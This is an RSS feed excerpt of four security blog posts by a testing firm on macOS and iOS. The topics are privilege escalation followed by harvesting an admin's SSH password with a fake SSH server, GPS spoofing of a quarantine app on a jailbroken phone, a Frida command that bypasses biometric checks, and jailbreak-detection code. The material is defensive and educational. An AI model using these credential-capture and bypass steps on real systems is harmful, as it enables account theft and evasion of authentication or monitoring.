<content:encoded><![CDATA[<figure><img alt="LPE in macOS" src="https://cdn-images-1.medium.com/max/1024/1*7tSBe_CvSNxJ1sB5TYTIEg.jpeg" /></figure><h3>macOS infrastructure</h3><p>Apple devices have been present in companies for a long time. Wherever there is a need to deploy iOS applications, testers and programmers have to use Macs. UX/UI designers and movie editors use Macs for apps that are only available on Apple platforms. It is also worth noting that Macs are introduced to companies because managers and directors want to use them as well. While the Windows infrastructure in big companies is usually mature and well-tested, the Mac infrastructure is usually no man’s land. After digging into some huge networks, we observed a lot of ugly hacks and bad scripting undermining the company’s security. Compromising one Mac can affect the whole intranet, as Macs often have access to SMB shares and perform Kerberos authentication to internal resources.</p><h3>Vulnerable pattern</h3><p>In this article we’d like to show you a common, vulnerable pattern present in macOS networks. Machines need to be somehow managed. The most efficient approach nowadays is a hybrid solution that both enrolls devices in an MDM and installs agents. MDM profiles are nice but have limitations, so for wider management functionality, these systems employ traditional SSH connections.<strong> The problem starts when macadmins use the same account with the same password across all devices in the network.</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*cs2C3xCtvwA-pifK.jpg" /></figure><h3>Elevating privileges: an XPC vulnerability example</h3><p>Typically, in managed Mac infrastructures users do not have root privileges. They run as standard users who are not in the admin group and are not included in the sudoers file. An attacker who compromises one machine usually wants to perform lateral movement and compromise other Macs. 
If the network implements the above-mentioned vulnerable pattern, the easiest way is to elevate permissions from user to root and steal the macadmin’s password via a fake SSH server. Recently, one of our security consultants gave a talk on “Abusing &amp; Securing XPC applications”. Using XPC to elevate the user’s privileges seems to be a perfect solution for that purpose. As shown in the presentation, XPC vulnerabilities are everywhere. If you are interested in XPC exploitation, we strongly recommend watching <a href="https://www.securing.pl/en/presentation/abusing-securing-xpc-in-macos-apps/"><strong>this talk</strong></a>.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*sSkwtfafBsVRNoDA.jpg" /></figure><h3>Lateral movement</h3><p>To fake the SSH server, we can simply use the <a href="https://github.com/droberson/ssh-honeypot">SSH-Honeypot project</a>. Clone it and run the following commands:</p><pre>#!/bin/sh<br>brew install libssh json-c<br>make -f MakefileOSX<br>bin/ssh-honeypot -r ./ssh-honeypot.rsa</pre><p>Now wait until the macadmin connects over SSH:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*EL6_11-Q9XiNL_Eo.png" /></figure><p>Now we can perform lateral movement to compromise other machines.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*GefGoY5Iz4HfFZYE.jpg" /></figure><h3>Summary</h3><p>In this article we wanted to present a common vulnerability pattern that we observe in Mac infrastructures. Elevating privileges on one machine may allow the attacker to compromise all Macs in the company and thus access sensitive resources available from each machine. Vulnerabilities in applications are not rare, so in professional networks, deploy logging and incident response solutions. Keep in mind that responding to incidents is a defense-in-depth practice and every large Mac network should be thoroughly tested. 
An infrastructure assessment allows you to detect such vulnerable patterns and make your network more secure.</p><p>If you want to secure your infrastructure, leave your contact details in our form. We will get back to you to discuss your case as soon as possible.</p><p><em>Originally published at </em><a href="https://www.securing.pl/en/local-privilege-escalation-in-macos-infrastructure/"><em>https://www.securing.pl</em></a><em> on December 9, 2020.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=df02df60bab2" width="1" height="1" alt=""><hr><p><a href="https://medium.com/securing/local-privilege-escalation-in-macos-infrastructure-df02df60bab2">Local Privilege Escalation in macOS infrastructure</a> was originally published in <a href="https://medium.com/securing">SecuRing</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Why is jailbreak detection important? — COVID apps case]]></title>
            <link>https://medium.com/securing/why-is-jailbreak-detection-important-covid-apps-case-cacc02e2a7f6?source=rss-4698055bdb3------2</link>
            <guid isPermaLink="false">https://medium.com/p/cacc02e2a7f6</guid>
            <category><![CDATA[ios]]></category>
            <category><![CDATA[covid19]]></category>
            <category><![CDATA[app-security]]></category>
            <dc:creator><![CDATA[Wojciech Reguła]]></dc:creator>
            <pubDate>Thu, 13 Aug 2020 07:57:19 GMT</pubDate>
            <atom:updated>2020-08-13T07:57:19.798Z</atom:updated>
<content:encoded><![CDATA[<h3>Why is jailbreak detection important? — COVID apps case</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*c-ERWRqnbI4x73lH" /></figure><p>Some time ago I got stuck in the USA because of COVID-19. After coming back to Poland on an “evacuation flight”, I had to undergo a mandatory 14-day quarantine. Every day the Polish Police visited me to check that I was staying at home and not going outside. As we all expected, this was a big overhead for the Police, since they had to visit each quarantined person every day. My friends told me that I could install an official government app that reports my location every day. After installation, the user has to complete a daily task that includes sending a selfie from home. Under the hood, the application also reports the user’s location. I started to wonder whether the application was properly protected against GPS spoofing attacks.</p><iframe src="https://cdn.embedly.com/widgets/media.html?src=https%3A%2F%2Fgiphy.com%2Fembed%2FYJDpfht5PU5i0%2Ftwitter%2Fiframe&amp;display_name=Giphy&amp;url=https%3A%2F%2Fmedia.giphy.com%2Fmedia%2FYJDpfht5PU5i0%2Fgiphy.gif&amp;image=https%3A%2F%2Fi.giphy.com%2Fmedia%2FYJDpfht5PU5i0%2Fgiphy.gif&amp;key=a19fcc184b9711e1b4764040d3dc5c07&amp;type=text%2Fhtml&amp;schema=giphy" width="435" height="390" frameborder="0" scrolling="no"><a href="https://medium.com/media/25b83d3e25cc70638712f6ecb3c96e1a/href">https://medium.com/media/25b83d3e25cc70638712f6ecb3c96e1a/href</a></iframe><h3>Use the hyperdrive</h3><p>There are many applications/tweaks that allow you to change your GPS coordinates on iOS. Detecting them is, however, not simple. There are a few approaches, such as constantly reporting the user’s location or analyzing the user’s velocity. The quarantine application I installed didn’t support such mechanisms (actually, I saw an anti-GPS-spoofing method in the code, but it was probably only a mock). 
So, I jailbroke my iPhone, downloaded the AkLocationX tweak, and opened the quarantine application. After successful registration, I spoofed my location as follows:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/750/0*cYvGlXArMm-bmFKF" /></figure><p>I opened the application, and it turned out I was somewhere in the North Pacific Ocean.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/750/0*OpTQkW5EGUkjLz8_" /></figure><p>As you can see, tricking this application was rather simple, and even a script kiddie could bypass the quarantine. That may affect public health. In the next section, I’ll show you an improvement that can help with detecting such suspicious behavior.</p><h3>Jailbreak detection</h3><p>As <a href="https://www.google.com/url?q=https://en.wikipedia.org/wiki/IOS_jailbreaking&amp;sa=D&amp;ust=1597307381749000&amp;usg=AFQjCNFHVg12E-GPO5sz0vV4OUl6qvjkLQ">Wikipedia</a> says:</p><blockquote>Jailbreaking is the privilege escalation of an Apple device for the purpose of removing software restrictions imposed by Apple on iOS, iPadOS, tvOS, and watchOS operating systems. This is typically done by using a series of kernel patches. Jailbreaking permits root access in Apple’s mobile operating system, allowing the installation of software that is unavailable through the official Apple App Store.</blockquote><p>To trick the quarantine application, I first needed a jailbroken device, since it was required to install the GPS spoofing tweak. So, the idea is to detect the jailbreak and respond appropriately. For quarantine applications, maybe a good solution is not to trust the GPS location on jailbroken devices and to send the Police to verify the user’s location instead?</p><h3>Freedom vs jailbreaking</h3><p>Here, I need to say I’m totally against blocking applications on devices where a jailbreak is detected. Users should have the choice to use a jailbroken or a jailed device. 
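</p><p>For illustration, the simplest jailbreak checks just look for artifacts that exist only on jailbroken devices. Below is a deliberately minimal sketch; real detection, such as in iOS Security Suite, combines many more signals:</p>

```swift
import Foundation

// Files that typically exist only on jailbroken iOS devices. A real
// implementation checks many more paths plus other signals (writable
// system directories, suspicious dylibs, URL schemes like cydia://).
let jailbreakArtifacts = [
    "/Applications/Cydia.app",
    "/Library/MobileSubstrate/MobileSubstrate.dylib",
    "/private/var/lib/apt",
]

func looksJailbroken() -> Bool {
    jailbreakArtifacts.contains { FileManager.default.fileExists(atPath: $0) }
}
```

<p>A single check like this is trivially bypassable, which is exactly why it should trigger logging or extra verification rather than be trusted as proof.</p><p>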
However, I also understand that jailbroken devices tend to be less secure. Jailbreaking usually means staying on an outdated iOS version with known vulnerabilities, and sometimes killing or modifying important security daemons. I remember the times when the SSH server was bound to all interfaces with the default root:alpine credentials. So if you connected to a public Wi-Fi network without device isolation, anyone could have taken over your device and executed any command as root.</p><iframe src="https://cdn.embedly.com/widgets/media.html?src=https%3A%2F%2Fgiphy.com%2Fembed%2FKI56Yfvk0785y%2Ftwitter%2Fiframe&amp;display_name=Giphy&amp;url=https%3A%2F%2Fgiphy.com%2Fgifs%2Fobi-wan-KI56Yfvk0785y&amp;image=https%3A%2F%2Fmedia2.giphy.com%2Fmedia%2FKI56Yfvk0785y%2F200.gif&amp;key=a19fcc184b9711e1b4764040d3dc5c07&amp;type=text%2Fhtml&amp;schema=giphy" width="435" height="273" frameborder="0" scrolling="no"><a href="https://medium.com/media/7036db1aff38059645b94a239891af8b/href">https://medium.com/media/7036db1aff38059645b94a239891af8b/href</a></iframe><p>We need to reach a compromise. High-risk applications have to respond somehow when they are run in a modified environment. In my opinion, a good solution is to perform the jailbreak checks, log the result, inform the user that their device is jailbroken, and have them accept the risk of using such a device.</p><h3>Jailbreak detection cannot be fully trusted</h3><p>Jailbreak detection is performed on the device, which can be fully controlled by the user. It means that the attacker will always win! If the attacker has root permissions and can modify everything on the device, they can also write an anti-anti-jailbreak mechanism. 
It can be done by modifying the application, creating a <a href="https://yalujailbreak.net/liberty-lite/">special tweak</a>, running a <a href="https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06j-testing-resiliency-against-reverse-engineering#bypassing-jailbreak-detection">Frida script</a>, or even creating a <a href="https://www.idownloadblog.com/2020/04/29/kernel-level-jailbreak-bypass/">kernel extension</a>.</p><p>You should always treat jailbreak detection as just another layer of security. It is really important to understand that implementing <strong>jailbreak detection cannot be your only defense</strong>. Applications always have to be coded securely, no matter whether the device is jailbroken or not.</p><h3>Other COVID applications</h3><p>In this research, I also quickly looked at some other quarantine applications. Since I didn’t have access to the activated versions, I just performed a quick static and semi-dynamic analysis to see if the apps detect jailbreaks. It turned out that only 1 of the 5 applications I quickly analyzed had such “protection”.</p><iframe src="https://cdn.embedly.com/widgets/media.html?src=https%3A%2F%2Fgiphy.com%2Fembed%2FdvD0OAETRfCXC%2Ftwitter%2Fiframe&amp;display_name=Giphy&amp;url=https%3A%2F%2Fgiphy.com%2Fgifs%2Fstar-wars-fail-dvD0OAETRfCXC&amp;image=https%3A%2F%2Fmedia2.giphy.com%2Fmedia%2FdvD0OAETRfCXC%2F200.gif&amp;key=a19fcc184b9711e1b4764040d3dc5c07&amp;type=text%2Fhtml&amp;schema=giphy" width="435" height="166" frameborder="0" scrolling="no"><a href="https://medium.com/media/cdc5ddc7e1249c483432d7b579c1b563/href">https://medium.com/media/cdc5ddc7e1249c483432d7b579c1b563/href</a></iframe><h3>Summary</h3><p>The Polish quarantine application on iOS was easily bypassable, which could have had an impact on public health. The application had neither GPS spoofing protection nor jailbreak detection mechanisms. 
While jailbreak detection is usually not important or required, there are some types of applications in which it should be implemented. Even one simple security layer may stop “script kiddies” from bypassing crucial features. On the other hand, we have to remember that an experienced attacker will always win when the checks are performed on the device. Do not make false assumptions, and always make sure your application is coded securely.</p><p>If you want to implement a jailbreak detection mechanism in your application, take a look at our free &amp; open source library — iOS Security Suite. You can find it on GitHub — <a href="https://github.com/securing/IOSSecuritySuite">https://github.com/securing/IOSSecuritySuite</a></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=cacc02e2a7f6" width="1" height="1" alt=""><hr><p><a href="https://medium.com/securing/why-is-jailbreak-detection-important-covid-apps-case-cacc02e2a7f6">Why is jailbreak detection important? — COVID apps case</a> was originally published in <a href="https://medium.com/securing">SecuRing</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Bypassing your apps’ biometric checks on iOS]]></title>
            <link>https://medium.com/securing/bypassing-your-apps-biometric-checks-on-ios-c2555c81a2dc?source=rss-4698055bdb3------2</link>
            <guid isPermaLink="false">https://medium.com/p/c2555c81a2dc</guid>
            <category><![CDATA[touch-id]]></category>
            <category><![CDATA[app-security]]></category>
            <category><![CDATA[ios]]></category>
            <category><![CDATA[ios-app-development]]></category>
            <dc:creator><![CDATA[Wojciech Reguła]]></dc:creator>
            <pubDate>Mon, 27 Jan 2020 14:42:18 GMT</pubDate>
            <atom:updated>2020-01-27T14:42:18.349Z</atom:updated>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*m3f2BujN0Jusl5wurhFjow.jpeg" /></figure><p>Using iOS biometrics features like Touch ID and Face ID is a really convenient way to authenticate a user before performing sensitive actions. These actions, of course, depend on the apps’ features. Usually, we test apps that use Touch ID/Face ID to log in and to confirm financial actions (e.g. a wire transfer). But can these checks be treated as 100% secure?</p><p>The answer is, of course, <strong>no</strong>. Biometric checks are performed on your device and, like any other client-side checks, can be bypassed if the attacker controls the application/device. In this blog post, I want to show you how easily that hack can be done. To perform the attack, we need:</p><ul><li>a jailbroken device (if you do not have one, check <a href="https://www.securing.pl/en/testing-ios-apps-without-jailbreak-in-2018/index.html">this presentation</a>),</li><li>Frida,</li><li>a text editor. 
😉</li></ul><h3>Sample app — SecuBank</h3><p>I prepared a really simple application that asks you for your finger/face and displays a message saying whether the verification was successful or not.</p><iframe src="https://cdn.embedly.com/widgets/media.html?src=https%3A%2F%2Fplayer.vimeo.com%2Fvideo%2F375401746%3Fapp_id%3D122963&amp;dntp=1&amp;url=https%3A%2F%2Fvimeo.com%2F375401746&amp;image=https%3A%2F%2Fi.vimeocdn.com%2Fvideo%2F834159949_960.jpg&amp;key=a19fcc184b9711e1b4764040d3dc5c07&amp;type=text%2Fhtml&amp;schema=vimeo" width="1080" height="1920" frameborder="0" scrolling="no"><a href="https://medium.com/media/090f66ce93d48236e8445ca6d9d07de2/href">https://medium.com/media/090f66ce93d48236e8445ca6d9d07de2/href</a></iframe><h4>Note that the application’s logic was implemented in Swift:</h4><iframe src="" width="0" height="0" frameborder="0" scrolling="no"><a href="https://medium.com/media/e8d41f72d838c96ebeb0bc3bdc1d0544/href">https://medium.com/media/e8d41f72d838c96ebeb0bc3bdc1d0544/href</a></iframe><h3>Frida script</h3><p>Now, we have to write a Frida script that bypasses the check. As you can see in the code snippet above, <em>evaluatePolicy</em> uses a callback that determines the result. 
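</p><p>In essence, the pattern looks like this (a stand-in closure replaces LAContext.evaluatePolicy from LocalAuthentication here, so the shape of the check is visible without the framework):</p>

```swift
// The whole security decision collapses to a Bool handed to a client-side
// closure. `authenticate` stands in for the real
// LAContext.evaluatePolicy(_:localizedReason:reply:) call.
func verifyBiometrics(_ authenticate: ((Bool, Error?) -> Void) -> Void,
                      onSuccess: @escaping () -> Void,
                      onFailure: @escaping () -> Void) {
    authenticate { success, _ in
        // An attacker instrumenting the process simply forces success == true.
        if success { onSuccess() } else { onFailure() }
    }
}
```

<p>Because the reply closure runs inside the attacker-controlled process, nothing prevents a hook from calling it with success set to true.</p><p>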
So, the easiest way to achieve the hack is to intercept that callback and make sure it always returns <em>success=1</em>.</p><iframe src="" width="0" height="0" frameborder="0" scrolling="no"><a href="https://medium.com/media/36ab007d8d2f5da4ca9e0c4fa099642b/href">https://medium.com/media/36ab007d8d2f5da4ca9e0c4fa099642b/href</a></iframe><h3>Hacking the SecuBank</h3><p>At this point, we just need to open SecuBank and load the script with Frida:</p><pre>$ frida -U -l bypass.js -f biz.securing.SecuBank --no-pause</pre><iframe src="https://cdn.embedly.com/widgets/media.html?src=https%3A%2F%2Fplayer.vimeo.com%2Fvideo%2F375401733%3Fapp_id%3D122963&amp;dntp=1&amp;url=https%3A%2F%2Fvimeo.com%2F375401733&amp;image=https%3A%2F%2Fi.vimeocdn.com%2Fvideo%2F834159912_960.jpg&amp;key=a19fcc184b9711e1b4764040d3dc5c07&amp;type=text%2Fhtml&amp;schema=vimeo" width="1080" height="1920" frameborder="0" scrolling="no"><a href="https://medium.com/media/fbb82e8db6af17a9886b0eea89aeafd8/href">https://medium.com/media/fbb82e8db6af17a9886b0eea89aeafd8/href</a></iframe><h3>Summary</h3><p>In this article, I showed you again that any kind of local check can be bypassed, including the biometric ones provided by iOS/macOS. 
These checks are really convenient, but you always have to remember that they cannot be relied upon if the device is jailbroken.</p><p>If you are interested in implementing such jailbreak checks, take a look at the <a href="https://github.com/securing/IOSSecuritySuite"><strong>iOS Security Suite</strong></a> — our open source project!</p><p><a href="https://medium.com/securing/implementing-anti-tampering-mechanism-in-ios-apps-c85ea9e73e22">Implementing anti-tampering mechanism in iOS apps</a></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=c2555c81a2dc" width="1" height="1" alt=""><hr><p><a href="https://medium.com/securing/bypassing-your-apps-biometric-checks-on-ios-c2555c81a2dc">Bypassing your apps’ biometric checks on iOS</a> was originally published in <a href="https://medium.com/securing">SecuRing</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Implementing anti-tampering mechanism in iOS apps]]></title>
            <link>https://medium.com/securing/implementing-anti-tampering-mechanism-in-ios-apps-c85ea9e73e22?source=rss-4698055bdb3------2</link>
            <guid isPermaLink="false">https://medium.com/p/c85ea9e73e22</guid>
            <category><![CDATA[security-testing]]></category>
            <category><![CDATA[security]]></category>
            <category><![CDATA[ios-apps]]></category>
            <category><![CDATA[ios]]></category>
            <category><![CDATA[mobile-security]]></category>
            <dc:creator><![CDATA[Wojciech Reguła]]></dc:creator>
            <pubDate>Mon, 20 May 2019 19:16:39 GMT</pubDate>
            <atom:updated>2019-09-05T18:40:43.230Z</atom:updated>
<content:encoded><![CDATA[<p>Security is a topic that should also be considered by iOS developers. Since the platform cannot be treated as 100% secure, devs and security teams need to create a separate threat model for mobile applications.</p><p>Over all the years iOS has existed, many different types of application vulnerabilities have been discovered. They can pose a real risk and should be covered first! Once that is done, in most cases the fire has been extinguished.</p><iframe src="https://cdn.embedly.com/widgets/media.html?src=https%3A%2F%2Fgiphy.com%2Fembed%2Fl0HlCD37sRinmhGyA%2Ftwitter%2Fiframe&amp;display_name=Giphy&amp;url=https%3A%2F%2Fmedia.giphy.com%2Fmedia%2Fl0HlCD37sRinmhGyA%2Fgiphy.gif&amp;image=https%3A%2F%2Fi.giphy.com%2Fmedia%2Fl0HlCD37sRinmhGyA%2Fgiphy.gif&amp;key=a19fcc184b9711e1b4764040d3dc5c07&amp;type=text%2Fhtml&amp;schema=giphy" width="435" height="244" frameborder="0" scrolling="no"><a href="https://medium.com/media/35a54d5bd412a04994a8947de71a915a/href">https://medium.com/media/35a54d5bd412a04994a8947de71a915a/href</a></iframe><p>However, if you are responsible for developing a high-risk application, you will probably be interested in achieving higher app resiliency. Before attackers can find vulnerabilities, they need to analyze your app. This is the moment when you can make their job harder — implement anti-tampering mechanisms and detect if your application has been launched in a malicious environment.</p><blockquote>Disclaimer: Before I show you my solution, you need to remember that this is only an additional security layer. Any anti-tampering mechanism <strong>cannot be</strong> a substitute for fixing vulnerabilities or writing secure code. Otherwise, it will provide only a false sense of security.</blockquote><p>To simplify the implementation of anti-tampering mechanisms in your iOS application, I decided to create the iOS Security Suite — a Swift library that will do all the checks for you! 
Click here to <a href="https://github.com/securing/IOSSecuritySuite"><strong>visit our GitHub page and download it</strong></a>.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*yRe4kqFmgICBSdMkxTUyTA.png" /></figure><p>Implementing ISS is really easy. To start using it:</p><ol><li>Just copy the files from the repo.</li></ol><pre>git clone <a href="https://github.com/securing/IOSSecuritySuite">https://github.com/securing/IOSSecuritySuite</a></pre><p>2. Install via CocoaPods</p><pre>pod &#39;IOSSecuritySuite&#39;</pre><p>3. Use Carthage</p><pre>github &quot;securing/IOSSecuritySuite&quot;</pre><p>Now, import ISS in your Swift code and you are set! Read the docs for the full description. Below is an example code snippet.</p><pre>import UIKit<br>import IOSSecuritySuite<br><br>class ViewController: UIViewController {<br><br>    override func viewDidAppear(_ animated: Bool) {<br>        let jailbreakStatus = IOSSecuritySuite.amIJailbrokenWithFailMessage()<br>        let title = jailbreakStatus.jailbroken ? &quot;Jailbroken&quot; : &quot;Jailed&quot;<br>        let message = &quot;&quot;&quot;<br>            Jailbreak: \(jailbreakStatus.failMessage),<br>            Run in emulator?: \(IOSSecuritySuite.amIRunInEmulator())<br>            Debugged?: \(IOSSecuritySuite.amIDebugged())<br>            Reversed?: \(IOSSecuritySuite.amIReverseEngineered())<br>            &quot;&quot;&quot;<br>        let alert = UIAlertController(title: title, message: message, preferredStyle: .alert)<br>        alert.addAction(UIAlertAction(title: &quot;Dismiss&quot;, style: .default))<br>        self.present(alert, animated: false)<br>    }<br>}</pre><iframe src="https://cdn.embedly.com/widgets/media.html?src=https%3A%2F%2Fgiphy.com%2Fembed%2FxT1R9Ivk4qi5CLoowM%2Ftwitter%2Fiframe&amp;url=https%3A%2F%2Fmedia.giphy.com%2Fmedia%2FxT1R9Ivk4qi5CLoowM%2Fgiphy.gif&amp;image=https%3A%2F%2Fi.giphy.com%2Fmedia%2FxT1R9Ivk4qi5CLoowM%2Fgiphy.gif&amp;key=d04bfffea46d4aeda930ec88cc64b87c&amp;type=text%2Fhtml&amp;schema=giphy" width="435" height="183" frameborder="0" scrolling="no"><a href="https://medium.com/media/22b24e226250527afd66abbcc6d8c074/href">https://medium.com/media/22b24e226250527afd66abbcc6d8c074/href</a></iframe><p>Including this tool in your project is not the only thing you should do in order to improve your app security! <strong>You should also read my </strong><a href="https://www.securing.biz/en/mobile-application-security-best-practices/index.html?utm_source=medium&amp;utm_medium=article&amp;utm_campaign=ios-security-suite"><strong>general mobile security whitepaper</strong></a><strong>.</strong></p><p>If you enjoyed this story, please click the 👏 button and share to help others find it! 
Feel free to leave a comment below.</p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=c85ea9e73e22" width="1" height="1" alt=""><hr><p><a href="https://medium.com/securing/implementing-anti-tampering-mechanism-in-ios-apps-c85ea9e73e22">Implementing anti-tampering mechanism in iOS apps</a> was originally published in <a href="https://medium.com/securing">SecuRing</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
    </channel>
</rss>